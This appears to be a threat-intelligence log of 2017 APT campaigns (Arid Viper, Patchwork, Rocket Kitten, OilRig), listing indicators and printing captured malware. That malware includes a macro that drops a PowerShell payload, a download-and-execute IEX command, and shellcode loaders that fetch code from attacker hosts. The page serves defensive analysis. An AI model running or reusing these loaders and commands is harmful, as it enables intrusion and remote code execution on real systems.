https://github.com/iagox86/dnscat2

Network

DNS tunneling to: nsn1.winodwsupdates.me

2017-11-21: Arid Viper

File Name        Conference_attendence_application.scr

File Size        1103872 bytes

File Type        PE32 executable (GUI) Intel 80386, for MS Windows

MD5        5fdc15ebebd840961d9963a91bc1b298

SHA1        c2791752885c650b8b3fe210ada1f0a78f450385

SHA256        009cc63d1e4fcb7da8b8c29c50a5d07f3bb4937098e211e42d5db889da5eae20

PE Information

Image Base        0x00400000

Entry Point        0x0041f147

Reported Checksum        0x00110233

Actual Checksum        0x00110233

Minimum OS Version        5.0

PDB Path        D:\Merge\Release\testproj.pdb

Compile Time        2017-11-21 08:28:58

Import Hash        2bceb64cf37acd34bc33b38f2cddfb61

Icon        

Icon Exact Hash        66e490d891a61d4dbe806246509aefce

Icon Similarity Hash        8b9e80abba0f10104d3f75334be85691

File Name        Introduction_prosure.scr

File Size        1046528 bytes

File Type        PE32 executable (GUI) Intel 80386, for MS Windows

MD5        fbab08af75babee2b750f4a707415d55

SHA1        3bd19aeb50c9ed4549e4c34dbdcddb1cc4d49841

SHA256        bc0027b9937b7d5e11f90d937aecb9ebc0b240cfe4f225f4cfcc003e776c2713

File name        Conference_attendence_application.doc

Associated Filenames        

C:\AVG\Conference_attendence_application.doc

File Size        299520 bytes

File Type        Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Saad Ahmed Almawas, Template: Normal.dotm, Last Saved By: abd, Revision Number: 9, Name of Creating Application: Microsoft Office Word, Total Editing Time: 41:00, Last Printed: Mon Aug 25 10:18:00 2014, Create Time/Date: Sun Oct 29 08:45:00 2017, Last Saved Time/Date: Tue Nov 21 08:28:00 2017, Number of Pages: 2, Number of Words: 245, Number of Characters: 1403, Security: 0

MD5        ef04011011f32f1fa8ca2e5686ca8d35

SHA1        5e67f31db10b313f3c98808c95ca83fbcad26433

SHA256        d0ca4fc570d438d41b5a631a000276e9c22d055937dea95780a34b6d7b3e60f8

SKLoudSL.exe

MD5        45f432ffe353e2860f68f4d690587e22

SHA-1        69cc58cd7fd1d83f697e174823e1f78aaf4f202f

SHA-256        4f45f431191992c48202bae66e4b280a9e441ccf7c7d65ea4c67ba6713a942bc

CopyrightSKLoud Copyright (C) 2017

Product SKLoudSL Application

Original name SKLoudSL.exe

Internal name SKLoudSL

File version 0, 0, 0, 10

Description SKLoud

Comments Beta Version

Drops

File name        chroma.exe

C:\AVG\chroma.exe

File Size        463360 bytes

File Type        PE32 executable (GUI) Intel 80386, for MS Windows

MD5        78bf4a943b6e025d9fc1cd511445cb0f

SHA1        ac8c8d7bd162832c8a399f3fe46311fa339e2f4b

SHA256        153eeb816584b28139fd1b749591f2543bdd2615c2d00d498c7db2a9678ec151

File names        Mona_Omar_CV_Visa_.com

testproj.exe

MD5 10a86718bfb4b1eaac76c92cfd2e962e

SHA1 87612ed872e20277f11f5dca4a3950c11aa13004

SHA256 1962618e2839c6b83a02829050a47e10660eba1ea8098e93eee79122078ac434

PE Information

Image Base        0x00400000

Entry Point        0x0041f147

Reported Checksum        0x000cf165

Actual Checksum        0x000cf165

Minimum OS Version        5.0

PDB Path        D:\Merge\Release\testproj.pdb

Compile Time        2017-11-21 07:04:21

Import Hash        2bceb64cf37acd34bc33b38f2cddfb61

Icon        

Icon Exact Hash        66e490d891a61d4dbe806246509aefce

Icon Similarity Hash        8b9e80abba0f10104d3f75334be85691

Drops

putty.exe

C:\AVG\putty.exe

File Size        463360 bytes

File Type        PE32 executable (GUI) Intel 80386, for MS Windows

MD5        f4c32760db07f7ce6309e57666190cc3

SHA1        9755452eb6bc765b3f5f5d6703405414165d2e1e

SHA256        a34d3852ab7d073be0e0c48b4b1d088a81c36714112457ee4040039cb61bdeae

File name        Report.docx

Associated Filenames        

C:\AVG\Report.docx

File Size        0 bytes

File name        feirfoxt.exe

C:\Adobe\feirfoxt.exe

File Size        463360 bytes

File Type        PE32 executable (GUI) Intel 80386, for MS Windows

MD5        ded58ee084748b2c486366c44199ceee

SHA1        60b5551ca17380a5f4a6a481f0104128f3d7abb0

SHA256        9267d84b5c8837e34c4fff8ae663933e495754fafdadf5722bb21ea1888be1ff

File Name        Sinwar.com

File Size        2505216 bytes

File Type        PE32 executable (GUI) Intel 80386, for MS Windows

MD5        12fb9161af36db000e6e0deb345a84f0

SHA1        40713df32ee4f719d380e1941490682be8c7ca9f

SHA256        a10d873dcabb867c7313c2e12aed5839cd9fa9fd0f62fdbf472b93cbb157b584

www.rviedofree.com

url: http://www.rviedofree.com/dad5/town.php

url: http://www.rviedofree.com/dad5/addCity.php

url: http://www.rviedofree.com/dad5/sign.php

Traffic

http://cloudyservs.com/pic/pic1.jpg

GET /pic/pic1.jpg HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; ms-office; MSOffice 15)
Accept-Encoding: gzip, deflate
Host: cloudyservs.com
Connection: Keep-Alive

        2017-11-20: Likely Hangover campaign

The Israeli CERT published a TLP:White alert about a spear phishing email coming from  publisher@media.randreports.org. See Google translated version:

Attached indicators were:

fileName

China_ADIZ_Report.docx

Microsoft.Win32.TaskScheduler.dll

MSWORD1.exe

aidz.bat

Service360.exe

md5

A331add639b31e59bbc66cf5d999ac05 (False positive, Microsoft.Win32.TaskScheduler.dll)

1e12ea58d922cde60b1f68c729bebd63

40c373d15a556744ae6c849d452faa5c

6f87804b53da8dc52f2ffd3b01f78105

1e12ea58d922cde60b1f68c729bebd63

url

hxxp://media.randreports.org/index.php?f=China_Adiz.doc

hxxp://media.randreports.org/index.php?f=MSWORD1.exe

hxxp://media.randreports.org/aidz.bat

IP

209.58.188.49

209.58.183.33

46.165.199.138

Sample

C:\Users\admin\AppData\Roaming\Qiho360Security\Service360\1.0.0.0\Service360.exe

(courtesy of any.run)

Other samples

Pivot and IOCs

Based on pivoting form the indicators we found tens of new domains, IPs and samples, and some old, overlapping with known Patchwork (a.k.a Hangover) campaign. This attribution is mostly based on indicators found in Incident Report: Malicious Document With Bangladesh Theme Possibly Linked to Patchwork Actor.

Type

indicator

Filename

Adobeflashplayer26_install_ver9.6.0[.]exe

Filename

adobeflashplayer26_install_ver9.6.0[.]exe

Filename

ADOBEFLASHPLAYER26_INSTALL_VER9.6.0[.]EXE

Filename

Bangladesh_Army_News[.]doc

Filename

China_ADIZ_Report[.]docx

Filename

China-Reports[.]ppt

Filename

NDiskMonitor[.]exe

Filename

RAT[.]exe

Filename

SLUNDP_27Sep17[.]doc

Filename

UNDP_27Sep17[.]doc

Domain

115.aliexprexx[.]net

Domain

163maiil[.]com

Domain

204.aliexprexx[.]net

Domain

3media.randreports[.]org

Domain

81.cn_jwjbmap_content_2017_09_12.militarypeoplecn[.]com

Domain

81.cn_jwjbmap_content_2017_09_12.www.militarypeoplecn[.]com

Domain

accounts.login.yahoomail[.]support

Domain

accounts-login-secure.163.com.neteease[.]com

Domain

accounts-login-secure.qq.com.neteease[.]com

Domain

aliexprexx[.]net

Domain

army.lk.dailynews.army.lk.dailynews.dwnnews[.]net

Domain

army.lk.dailynews.dwnnews[.]net

Domain

bdarmy[.]news

Domain

chinamil[.]info

Domain

ciis-cn[.]net

Domain

clep-cn[.]org

Domain

cnaas[.]org

Domain

cpcnews-cn[.]com

Domain

crazywomen-dating[.]com

Domain

dwnnews[.]net

Domain

engilish.sinamilnews[.]com

Domain

english.sinamilnews[.]com

Domain

euuwebmail[.]com

Domain

ftp.aliexprexx[.]net

Domain

ftp.army.lk.dailynews.dwnnews[.]net

Domain

ftp.bdarmy[.]news

Domain

ftp.ciis-cn[.]net

Domain

ftp.clep-cn[.]org

Domain

ftp.cnaas[.]org

Domain

ftp.cpcnews-cn[.]com

Domain

ftp.crazywomen-dating[.]com

Domain

ftp.dwnnews[.]net

Domain

ftp.euuwebmail[.]com

Domain

ftp.gffbzbgov-cn[.]org

Domain

ftp.gloalfirepower[.]org

Domain

ftp.iisdp[.]org

Domain

ftp.mfagov-cn[.]com

Domain

ftp.militarypeoplecn[.]com

Domain

ftp.neteease[.]com

Domain

ftp.pla-report[.]net

Domain

ftp.qzonecn[.]com

Domain

ftp.randreports[.]org

Domain

ftp.rannd[.]org

Domain

ftp.sinamilblog-cn[.]org

Domain

ftp.sinamilnews[.]com

Domain

ftp.stripshowsclub[.]com

Domain

ftp.tiexue-cn[.]net

Domain

ftp.zhiihua[.]org

Domain

gffbzbgov-cn[.]org

Domain

gloalfirepower[.]org

Domain

hov-9.hovql[.]com

Domain

join.stripshowsclub[.]com

Domain

mail.iisdp[.]org

Domain

mailgate.mfagov-cn[.]com

Domain

media.randreports[.]org

Domain

media.rannd[.]org

Domain

mfagov-cn[.]com

Domain

militarypeoplecn[.]com

Domain

militaryreviews[.]net

Domain

militarytechs[.]net

Domain

mofa.gov.bd.missions.embassy.bdarmy[.]news

Domain

mx.servicelogin[.]center

Domain

neteease[.]com

Domain

news.gffbzbgov-cn[.]org

Domain

ns1.rannd[.]org

Domain

ns2.rannd[.]org

Domain

office.aliexprexx[.]net

Domain

pla-report[.]net

Domain

qzonecn[.]com

Domain

randreports[.]org

Domain

rannd[.]org

Domain

relay.ustc-cn[.]org

Domain

service.mail.neteease[.]com

Domain

servicelogin[.]center

Domain

sinamilblog-cn[.]org

Domain

sinamilnews[.]com

Domain

sinodefence[.]info

Domain

smtp.mfagov-cn[.]com

Domain

sqlserver.aliexprexx[.]net

Domain

stone.neteease[.]com

Domain

stripshowsclub[.]com

Domain

tiexue-cn[.]net

Domain

ustc-cn[.]org

Domain

www.bdarmy[.]news

Domain

www.chinamil[.]info

Domain

www.ciis-cn[.]net

Domain

www.clep-cn[.]org

Domain

www.cnaas[.]org

Domain

www.dwnnews[.]net

Domain

www.euuwebmail[.]com

Domain

www.ftp.pla-report[.]net

Domain

www.gffbzbgov-cn[.]org

Domain

www.iisdp[.]org

Domain

www.mfagov-cn[.]com

Domain

www.militarypeoplecn[.]com

Domain

www.militaryreviews[.]net

Domain

www.militarytechs[.]net

Domain

www.mofa.gov.bd.missions.embassy.bdarmy[.]news

Domain

www.pla-report[.]net

Domain

www.qzonecn[.]com

Domain

www.randreports[.]org

Domain

www.rannd[.]org

Domain

www.servicelogin[.]center

Domain

www.sinamilblog-cn[.]org

Domain

www.sinodefence[.]info

Domain

www.stripshowsclub[.]com

Domain

www.tiexue-cn[.]net

Domain

www.ustc-cn[.]org

Domain

www.yahoomail[.]support

Domain

wwww.bdarmy[.]news

Domain

yahoomail[.]support

Domain

youku.com_v_show.qzonecn[.]com

Hash

0245014e2c7d313ef238ce2195f4b2a165b43e86

Hash

0aeda32f977c98c8160491358491d0ad0898dcaa3366bde60c0a3bf8541e7b3f

Hash

0c09c662699c507c553317a909665952562bd7e2434c4a719470f672bdada700

Hash

1cb64a9d8c47fd514dcb93a72503437ecdcfceb8

Hash

1d303d1948c59348d0352bd730ede33c

Hash

1e12ea58d922cde60b1f68c729bebd63

Hash

23d4f0e27bd49c2efdbbf7a14ecf5f97

Hash

260fa4d0680272feb537aac722466e58eb26c5de2ac858c10d3a244655544313

Hash

300d342493b7348cadf8d8c93e7a0f58

Hash

3069b82d30ae54a0204024cbd1df7870

Hash

3b6791d8f044f0e7f17d5cc577776e18

Hash

3dd9814aeae5530e514915c6f73125188a692d0df2e56788c4302cb63d406e03

Hash

40c373d15a556744ae6c849d452faa5c

Hash

40e47641255df1d570f7f6bb8ff8719de5644261

Hash

43d0a81e9477cbb6df0f4a8548416b6e93ec38dd

Hash

453ce32e7449bd1aef3cae48f9822e7957f4c09f

Hash

48b68a5ab219d7917dbe818e00ddbae889cf8655faf02639e4a3fbe4e46ef9b2

Hash

65d8e0ea02ba711d00d92e6946d829859a7f3816

Hash

6e68ca1c7ac7188969e3efb86444e12f

Hash

6f87804b53da8dc52f2ffd3b01f78105

Hash

6fef53c772c8d0c16184015a13bfbce2

Hash

6fef53c772c8d0c16184015a13bfbce2

Hash

73b3eee379bc0c3c24f495e6809d97431eade8d2

Hash

7535cf27ca99f8f77c8ae918ca07e8365289f27d252283444b1e6a5dd8bf087b

Hash

90b4cd89f85ed22fd0af8ef63e285b30f817bea5

Hash

953fee8ef679f8c6b6a19f6fdb0ae9a1

Hash

98a5332c52f5d959430b2ce0eda2f1cf33616657ca0b3630ee8d5f19f7b5005b

Hash

9bce8087bc8191ab9a8daa0027ecffeca7968a7f

Hash

bdcab66108557cf9ee8d75eb0cac1c3e344ed23c

Hash

be61b12b510537c6c23aadfe40bf3d09382be81ba8b215d2fb0cf468a0b977e7

Hash

bf94a8f82f9b3ec1ad36be72a27813a661654bc5215559bf10b9eddfd49021b4

Hash

c994faf45e10c5652dcb2e18358d0bbe23ba600c4840510c0412a18dbac6abf1

Hash

d37c5c007c14984a1e73738083b72181

Hash

d57817a1e9902b71a35372e65e8eff4d

Hash

d78b9c6fc1744d0afc02900182491e8520259e06

Hash

dfc469d0cca07e83e58c6266dcd6ac67c5d5dacd6c6ef2543b3ebbbf6d35a280

Hash

ec77d1b913b962f973ed70278877ab75

Hash

f0766afdaf89181401b1cbcf012f8e3bf7af8dde10f11407e23ad867e1b2922a

Hash

feae784b8a2256f134f216ead75b16e39c5ff0a1

IP

176.107.177[.]11

IP

176.107.177[.]9

IP

209.58.183[.]33

IP

209.58.185[.]37

IP

209.58.188[.]48

IP

209.58.188[.]49

IP

46.165.199[.]138

IP

46.165.199[.]141

IP

46.165.248[.]130

IP

93.115.30[.]146

IP

94.185.82[.]157

Phrase

C:\Users\admin\AppData\Roaming\Qiho360Security\Service360\1.0.0.0\Service360[.]exe

URL

http://46.165.199.141/DL/kingmax[.]exe

URL

http://ciis-cn.net/DL/kingmax[.]exe

URL

http://clep-cn.org/202ksl[.]exe

URL

http://english.sinamilnews.com/Microsoft%C2%A9InternetSecurityTool[.]exe

URL

http://media.randreports.org/index.php?f=China_ADIZ_Report[.]docx

URL

http://militaryreviews[.]net/unjobs

URL

http://neteease.com/adobe[.]exe

URL

http://www.ciis-cn.net/DL/winint[.]exe

URL

http://www.ciis-cn.net/index.php?f=Asia_Policy[.]doc

2017-11-19: Iranian threat group Rocket Kitten are monitoring this document

"Tracy Reed" (tracyreed.cfl@gmail.com) made a suggestion to this document:

Emails address tracyreed.cfl@gmail.com was used to register multiple domains:

These domains all show up in a report about Rockt Kitten by Collin Anderson and Claudio Guarnieri in a Defcon talk in 2016:

https://www.blackhat.com/docs/us-16/materials/us-16-Guarnieri-Iran-And-The-Soft-War-For-Internet-Dominance-wp.pdf   

This can be seen in ThreatMiner as well: https://www.threatminer.org/report.php?q=Iran%20and%20the%20Soft%20War%20for%20Internet%20Dominance%20-%20Claudio%20Guarnieri.pdf&y=2016 

"Ibrahim Ali Khan" made the same suggestion:

2017-11-16: Iranian Oilrig campaign with C2 coldflys[.]com

Leads and analysis with @ImPureMotion and @blu3_team

User list must change password.xls

MD5 c10fc157d1c291c66284a9f07b52a376

SHA1 0bd6e06470e384571058774d9b43841c8ffe54c2

SHA256 b409538c99f99b94a5035d9fa44a506b41be0feb23e89b7e4d272ba791aa6002

https://www.hybrid-analysis.com/sample/b409538c99f99b94a5035d9fa44a506b41be0feb23e89b7e4d272ba791aa6002?environmentId=100 

COMPATIBILITY WARNING For viewing the content please press the above "Enable Content" button. This document was created by a newer version of microsoft office. This document is incompatible with current version of office.<

====================================================================

Private Sub Workbook_Open()

    Set osList = GetObject("winmgmts:").InstancesOf("Win32_OperatingSystem")

    For Each os In osList

        If CInt(Split(os.Version, ".")(0)) < 6 Then

            Exit Sub

        Else

            Exit For

        End If

    Next

    Call doom3_Init

    Call doom3_ShowHideSheets

End Sub

Function base64_decode(encodedstr)

    Const r64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"

    Dim table(256), decodedstr

   

    For x = 1 To 256 Step 1

        table(x) = -1

    Next

    For x = 1 To 64 Step 1

        table(1 + Asc(Mid(r64, x, 1))) = x - 1

    Next

   

    Dim size

    size = Len(encodedstr)

    bits = 0

    decodedstr = ""

    For x = 1 To size Step 1

        c = table(1 + Asc(Mid(encodedstr, x, 1)))

        If (c <> -1) Then

            If (bits = 0) Then

                outword = c * 4

                bits = 6

            ElseIf (bits = 2) Then

                outword = c + outword

                decodedstr = decodedstr & (Chr(CLng("&H" & Hex(outword Mod 256))))

                bits = 0

            ElseIf (bits = 4) Then

                outword = outword + Int(c / 4)

                decodedstr = decodedstr & (Chr(CLng("&H" & Hex(outword Mod 256))))

                outword = c * 64

                bits = 2

            Else

                outword = outword + Int(c / 16)

                decodedstr = decodedstr & (Chr(CLng("&H" & Hex(outword Mod 256))))

                outword = c * 16

                bits = 4

            End If

        End If

    Next

    base64_decode = decodedstr

End Function

Function Concat(fstr, sstr)

    Concat = fstr & sstr

End Function

Function Concot(fstr)

    Concot = fstr & Chr(34)

End Function

Sub doom3_ShowHideSheets()

    If ActiveWorkbook.Worksheets(1).Visible Then

        Dim WS_Count As Integer

        Dim I As Integer

        WS_Count = ActiveWorkbook.Worksheets.Count

        For I = 1 To WS_Count

            ActiveWorkbook.Worksheets(I).Visible = True

        Next I

        ActiveWorkbook.Worksheets(1).Visible = False

        ActiveWorkbook.Worksheets(2).Activate

    End If

End Sub

Sub doom3_Init()

    Set wss = CreateObject("WScript.Shell")

    pth = wss.ExpandEnvironmentStrings("%PUBLIC%") & "\Libraries\"

   

    Set fso = CreateObject("Scripting.FileSystemObject")

    If Not (fso.FolderExists(pth)) Then

        fso.CreateFolder (pth)

    End If

    If Not (fso.FileExists(pth & "test5.vbs")) Then

        VBS = "CreateObject("

        VBS = Concot(VBS)

        VBS = Concat(VBS, "WScript.Shell")

        VBS = Concot(VBS)

        VBS = Concat(VBS, ").R")

        VBS = Concat(VBS, "un ")

        VBS = Concot(VBS)

        VBS = Concat(VBS, "cmd /c type ")

        VBS = Concat(VBS, pth)

        VBS = Concat(VBS, "te")

        VBS = Concat(VBS, "st5.txt")

        VBS = Concat(VBS, " | ")

        VBS = Concat(VBS, "powe")

        VBS = Concat(VBS, "rshell -ex")

        VBS = Concat(VBS, "ec byp")

        VBS = Concat(VBS, "ass -no")

        VBS = Concat(VBS, "profile - ")

        VBS = Concot(VBS)

        VBS = Concat(VBS, ",0")

        Set spoFile = fso.CreateTextFile(pth & "test5.vbs")

        spoFile.Write (VBS)

        spoFile.Close

       

        Set PS1 = ActiveWorkbook.Worksheets("Incom" & "pati" & "ble").Cells(1, 24)

        Set spoFile = fso.CreateTextFile(pth & "tes" & "t5.txt")

        PS1 = base64_decode(PS1)

        spoFile.Write (PS1)

        spoFile.Close

        Set fso = Nothing

        cmd1 = Concat("sch", "tasks /cre")

        cmd1 = Concat(cmd1, ("ate /F /sc once /st " & Chr(34)))

        cmd1 = Concat(cmd1, (Format((Now + TimeValue("0:0" & "2:0")), "HH:mm:ss")))

        cmd1 = Concat(cmd1, (Chr(34) & " /tn "))

        cmd1 = Concat(cmd1, Chr(34))

        cmd1 = Concat(cmd1, ("Office_Update" & Chr(34) & " /tr " & pth & "test5.vbs"))

        cmd2 = "sch" & "tasks /run /tn " & Chr(34) & "Office_Update" & Chr(34)

        wss.Run cmd1, 0

        Application.Wait (Now + TimeValue("0:00:5"))

        wss.Run cmd2, 0

        Set wss = Nothing

    End If

End Sub

====================================================================

Drops

%PUBLIC%\Libraries\RecordedTVJ1332294583\962156718.txt

00e49b4f8250fa4ab60d0d46b2220abc

4964e00820f9f20343fe9ae35b0a4a590a712d03

837cf2a06139f232fe5f76443d6b6e04972164fa6959bc7a658ff024a8dd726b

%PUBLIC%\Libraries\RecordedTVJ1332294583\896274052.txt

6452d9bf5f9f52ebfc17bc487b4e3227

c7071ea6f805391b881ca499de72c8ba3453f4f3

89771f71128eac7a9abecf8ab5b27330e5d43232f4c0c5b882adf894ce8f152c

%PUBLIC%\Libraries\RecordedTVJ1332294583\1524472706.vbs

dea244b264d9efbf5ed0301a6278606f

5744eb01f66e512bdb34fc9330f6a1f669cd6d12

25196d490ed421e98d0a2b5578ab9ddb64846f50f68305bcb403e2e8e134e262

C2

coldflys.com

Hosted in kownhost.com

Persistency

"C:\Windows\System32\schtasks.exe" /create /F /sc once /st "12:40:26" /tn "Office_Update" /tr C:\Users\Public\Libraries\test5.vbs

Process Tree

·         EXCEL.EXE /dde (PID: 3072) 

o    schtasks.exe /create /F /sc once /st "14:51:26" /tn "Office_Update" /tr %PUBLIC%\Libraries\test5.vbs (PID: 3748)  

o    schtasks.exe /run /tn "Office_Update" (PID: 1036)  

·         wscript.exe "%PUBLIC%\Libraries\test5.vbs" (PID: 3712) 

o    cmd.exe /c type %PUBLIC%\Libraries\test5.txt | powershell -exec bypass -noprofile - (PID: 3848) 

§   cmd.exe /S /D /c" type %PUBLIC%\Libraries\test5.txt " (PID: 3880) 

§   powershell.exe powershell -exec bypass -noprofile - (PID: 3804)  

§   schtasks.exe /create /F /sc minute /mo 3 /tn GoogleUpdateTasksMachineUI /tr %PUBLIC%\Libraries\RecordedTVJ1332294583\1524472706.vbs (PID: 4000)  

§   schtasks.exe /delete /F /tn Office_Update (PID: 4024)  

IOCs

"%PUBLIC%\Libraries\test5.vbs

%PUBLIC%\Libraries\RecordedTVJ1332294583\1524472706.vbs

http://coldflys.com/index.aspx?id=h119770395

ns2.coldflys.com

dea244b264d9efbf5ed0301a6278606f

www.coldflys.com

User list must change password.xls

ns1.coldflys.com

c10fc157d1c291c66284a9f07b52a376

ns1.coldflys.com

00e49b4f8250fa4ab60d0d46b2220abc

0bd6e06470e384571058774d9b43841c8ffe54c2

b409538c99f99b94a5035d9fa44a506b41be0feb23e89b7e4d272ba791aa6002

6452d9bf5f9f52ebfc17bc487b4e3227

ns2.coldflys.com

coldflys.com

79.137.113.255

zzo000004yr30.coldflys.com

zz0000000tk30.coldflys.com

2017-11-15: 密碼強制更改通知.docx

密碼強制更改通知.docx

MD5        7a453ad57ab88e0d72fdf7b0366719e8

SHA1        f074a624cc158e63f2f3d77a47fde449715d3623

SHA256        f12dca90a069c948e07b4ebb00d0bd1c409d094a551ead4db024a92cd900b01d

Submitted from Taiwan

Translation (by NewTime AgeFul) : ‘good day, we detect your password leaking and also malicious IP records, please change your password immediately,  detail please check

Contains:

==============================================================

 objShell=wscript.createObject("wscript.shell")

objShell.Run "powershell.exe -executionpolicy bypass -Windowstyle hidden -noninteractive -nologo IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/xmlsdj4561/e1be55752515bb9e61056ba9ba72a1e7/raw/3ada089c57fa03a70692e5d543b7c20389efc387/favicon.ico')",0,true

wscript.quit*

==============================================================

[Himanshu Anand]: Content of:  https://gist.githubusercontent.com/xmlsdj4561/e1be55752515bb9e61056ba9ba72a1e7/raw/3ada089c57fa03a70692e5d543b7c20389efc387/favicon.ico

==============================================================

Set-StrictMode -Version 2

$DoIt = @'

function func_get_proc_address {

        Param ($var_module, $var_procedure)                

        $var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')

        

        return $var_unsafe_native_methods.GetMethod('GetProcAddress').Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))

}

function func_get_delegate_type {

        Param (

                [Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,

                [Parameter(Position = 1)] [Type] $var_return_type = [Void]

        )

        

        $var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])

        $var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')

        $var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')

        

        return $var_type_builder.CreateType()

}

[Byte[]]$var_code = [System.Convert]::FromBase64String("TVroAAAAAFtSRVWJ5YHDcoAAAP/TicNXaAQAAABQ/9Bo8LWiVmgFAAAAUP/TAAAAAAAAAAAAAAAAAAAA8AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAACf0hwW27NyRduzckXbs3JFZvzkRdqzckXF4fZF8rNyRcXh50XIs3JFxeHxRVqzckX8dQlF1LNyRduzc0UGs3JFxeH7RWKzckXF4eBF2rNyRcXh40Xas3JFUmljaNuzckUAAAAAAAAAAAAAAAAAAAAAUEUAAEwBBQBOViNZAAAAAAAAAADgAAKhCwEJAABCAgAA4gAAAAAAAFFvAQAAEAAAAGACAAAAABAAEAAAAAIAAAUAAAAAAAAABQAAAAAAAAAAMAQAAAQAAC+NAwACAEABAAAQAAAQAAAAABAAABAAAAAAAAAQAAAAAPsCAFEAAABk6AIAoAAAAAAABAC0AQAAAAAAAAAAAAAAAAAAAAAAAAAQBADkFgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC44gIAQAAAAAAAAAAAAAAAAGACAGQDAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAudGV4dAAAAMpBAgAAEAAAAEIC

…..

==============================================================

Drops:

CobaltStrike

_ReflectiveLoader@4

https://www.virustotal.com/#/file/827fba7ff0d6da9244d7e23fe2124c1553d83924cec67c92b11b554b36f0b8a7

MD5        53cad20bbcd888fc515ccbe78e2e8897

SHA-1        3aacc85e8c84830e3b185f6476c01f5195e6d99d

SHA-256        827fba7ff0d6da9244d7e23fe2124c1553d83924cec67c92b11b554b36f0b8a7

Authentihash        e53b4a1d843cae4b16744a1735309ef381f683f9970eed8a9484a9695be05a4d


2017-11-14: Arid Viper and VIRTUALNOTE

(Lead credit: @ImPureMotion)

Attacker uses pastes on https://pastebin.com/u/virtualnote for second stage scripts delivery. Some pastes are private


Whos @ljaZeer   ?

 محضر اجتماع اليوم - Minutes of today 's meeting

MD5 656f5a3b32f242054dbf30ccb358a0ce

SHA1 eff2a0ea43f9146eec6fb71eff35c5f2474fa1f6

SHA256 7a1fa34ca804492415579c3ed4f505a7f09fcd7bc834590cff86e2ce77c4fc73

Exploits DDE

Creation time 2017-10-24 22:34:00

v.dat 
MD5 a7ddbe8a7dc013f6127ef685ce48ed16

SHA1 1aeb15468663d5823e43b0c175c6d8850e7cf9a6

SHA256 862a9836450a0988bc0f5bd5042392d12d983197f40654c44617a03ff5f2e1d5

Based on Pivot:

Submitted from Palestine, this might be the attacker:

zix.exe

MD5        b7a06d23d0593b1813be882263e7b96a

SHA-1        00b97a49e1208c55e83f7df8e36f9954707e251d

SHA-256        bdc633fe3145d87036ad759be855771d5bb3ca592cecca9ef7f41454d7cf9f05

https://www.hybrid-analysis.com/sample/bdc633fe3145d87036ad759be855771d5bb3ca592cecca9ef7f41454d7cf9f05?environmentId=100 

md.exe /S /D /c" echo $sVQWw = New-Object IO.MemoryStream :

======================================================================

$diMRMfZk = @'

function ifYFpvaR {

        Param ($var_module, $var_procedure)

        $BdYKbPwp = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')

        return $BdYKbPwp.GetMethod('GetProcAddress').Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($BdYKbPwp.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))

}

function XVu {

        Param (

                [Parameter(Position = 0, Mandatory = $True)] [Type[]] $xvoiv,

                [Parameter(Position = 1)] [Type] $EECGK = [Void]

        )

        $nMGooHV = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])

        $nMGooHV.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $xvoiv).SetImplementationFlags('Runtime, Managed')

        $nMGooHV.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $EECGK, $xvoiv).SetImplementationFlags('Runtime, Managed')

        return $nMGooHV.CreateType()

}

[System.Net.WebRequest]::DefaultWebProxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials

[Byte[]]$XGOleOo = (New-Object System.Net.WebClient).DownloadData("http://storgemydata.website/output.bmp")

$keZCpVPaC = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((ifYFpvaR kernel32.dll VirtualAlloc), (XVu @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $XGOleOo.Length,0x3000, 0x40)

[System.Runtime.InteropServices.Marshal]::Copy($XGOleOo, 0, $keZCpVPaC, $XGOleOo.length)

